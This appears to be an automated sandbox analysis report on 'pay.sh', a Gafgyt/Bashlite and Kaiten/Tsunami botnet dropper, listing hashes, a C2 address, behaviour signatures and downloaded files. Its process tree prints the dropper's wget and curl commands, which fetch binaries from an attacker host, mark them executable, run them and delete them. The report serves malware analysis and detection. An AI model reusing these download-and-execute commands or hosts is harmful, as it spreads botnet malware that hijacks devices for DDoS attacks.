Analysis

  • max time kernel
    64s
  • max time network
    69s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    22-10-2024 16:06

General

  • Target

    pay.sh

  • Size

    3KB

  • MD5

    cf70ee36f1e9247f2146e4981924d4f4

  • SHA1

    7eabae4200118c4e89979658db6e4d905fe3dae9

  • SHA256

    0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c

  • SHA512

    60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0

Malware Config

Extracted

Family

gafgyt

C2

104.234.24.138:1990

Signatures

  • Detected Gafgyt variant 1 IoCs
  • Detects Kaiten/Tsunami Payload 2 IoCs
  • Detects Kaiten/Tsunami payload 2 IoCs
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • Kaiten/Tsunami

    Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.

  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Modifies Bash startup script 2 TTPs 1 IoCs
  • Reads runtime system information 5 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 10 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/pay.sh
    /tmp/pay.sh
    1⤵
    • Creates/modifies environment variables
    • Modifies Bash startup script
    PID:698
    • /usr/bin/wget
      wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0
      2⤵
      • Writes file to tmp directory
      PID:702
    • /usr/bin/curl
      curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:726
    • /bin/chmod
      chmod +x m3cr0
      2⤵
      • File and Directory Permissions Modification
      PID:733
    • /tmp/m3cr0
      ./m3cr0
      2⤵
      • Executes dropped EXE
      PID:734
    • /bin/rm
      rm -rf m3cr0
      2⤵
        PID:737
      • /bin/rm
        rm -rf m3cr0.1
        2⤵
          PID:739
        • /usr/bin/wget
          wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64
          2⤵
          • Writes file to tmp directory
          PID:740
        • /usr/bin/curl
          curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:750
        • /bin/chmod
          chmod +x zigaarch64
          2⤵
          • File and Directory Permissions Modification
          PID:759
        • /tmp/zigaarch64
          ./zigaarch64
          2⤵
          • Executes dropped EXE
          PID:761
        • /bin/rm
          rm -rf zigaarch64
          2⤵
            PID:763
          • /bin/rm
            rm -rf zigaarch64.1
            2⤵
              PID:765
            • /usr/bin/wget
              wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x
              2⤵
              • Writes file to tmp directory
              PID:766
            • /usr/bin/curl
              curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:778
            • /bin/chmod
              chmod +x x00x
              2⤵
              • File and Directory Permissions Modification
              PID:792
            • /tmp/x00x
              ./x00x
              2⤵
              • Executes dropped EXE
              PID:793
            • /bin/rm
              rm -rf x00x
              2⤵
                PID:795
              • /bin/rm
                rm -rf x00x.1
                2⤵
                  PID:796
                • /usr/bin/wget
                  wget http://floodernetwork111.accesscam.org:8089/bash.sh
                  2⤵
                  • Writes file to tmp directory
                  PID:797
                • /usr/bin/curl
                  curl -O http://floodernetwork111.accesscam.org:8089/bash.sh
                  2⤵
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:799
                • /bin/rm
                  rm -rf bash.sh.1
                  2⤵
                    PID:802
                  • /bin/bash
                    bash bash.sh
                    2⤵
                      PID:801
                      • /usr/bin/wget
                        wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0
                        3⤵
                        • Writes file to tmp directory
                        PID:803
                      • /usr/bin/curl
                        curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0
                        3⤵
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:804
                      • /bin/chmod
                        chmod +x m3cr0
                        3⤵
                        • File and Directory Permissions Modification
                        PID:806
                      • /tmp/m3cr0
                        ./m3cr0
                        3⤵
                        • Executes dropped EXE
                        PID:807
                      • /bin/rm
                        rm -rf m3cr0
                        3⤵
                          PID:809
                        • /bin/rm
                          rm -rf m3cr0.1
                          3⤵
                            PID:810
                          • /bin/sleep
                            sleep 6000
                            3⤵
                              PID:811

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • /tmp/bash.sh

                          Filesize

                          236B

                          MD5

                          8bbe815474c7d3ed318e958c05e1c95b

                          SHA1

                          36235a707a29d27b01570ef8c973c522f563c15c

                          SHA256

                          469640f9d4de9b71c4720298f7eb585c403f5a13e55e2bedc0da3937dd8b8f5b

                          SHA512

                          137a228141556d1fc6da421fd8bc45b81108908c39e734b235af6dca9b36dee059043f046dd2f670067a10db1e0280a0941f45c0b7ee1c774d1aa7f4cc2e756f

                        • /tmp/m3cr0

                          Filesize

                          983KB

                          MD5

                          75c00b238bd8105414cbb5d08601ca1a

                          SHA1

                          2a5e59555f348bfd9fa9fc4e3e04338ee4e74576

                          SHA256

                          edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361

                          SHA512

                          a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5

                        • /tmp/x00x

                          Filesize

                          985KB

                          MD5

                          f042a9131a6d06671e98c1ed1f8d80a8

                          SHA1

                          dd97fac87e8d4a973dc4867524908f3384916f27

                          SHA256

                          a70fdd8fa252beeca41955bee2d4ce3e6e1f6aa60746ee96ec59b96106080a6c

                          SHA512

                          629282e501a77e08295260802427747288af6bca1c0695adb9325b9ce01b9e4b0f4a065c86829eeba5c91cfb66d2965d3de3968e87a3d277471a2216ea2eaafe

                        • /tmp/zigaarch64

                          Filesize

                          73KB

                          MD5

                          48ea3c3566c796e4f74e8e3d6df15cd3

                          SHA1

                          b1ef1574ced09471c26a4c749d5a4ab5ba7942cd

                          SHA256

                          79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a

                          SHA512

                          cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd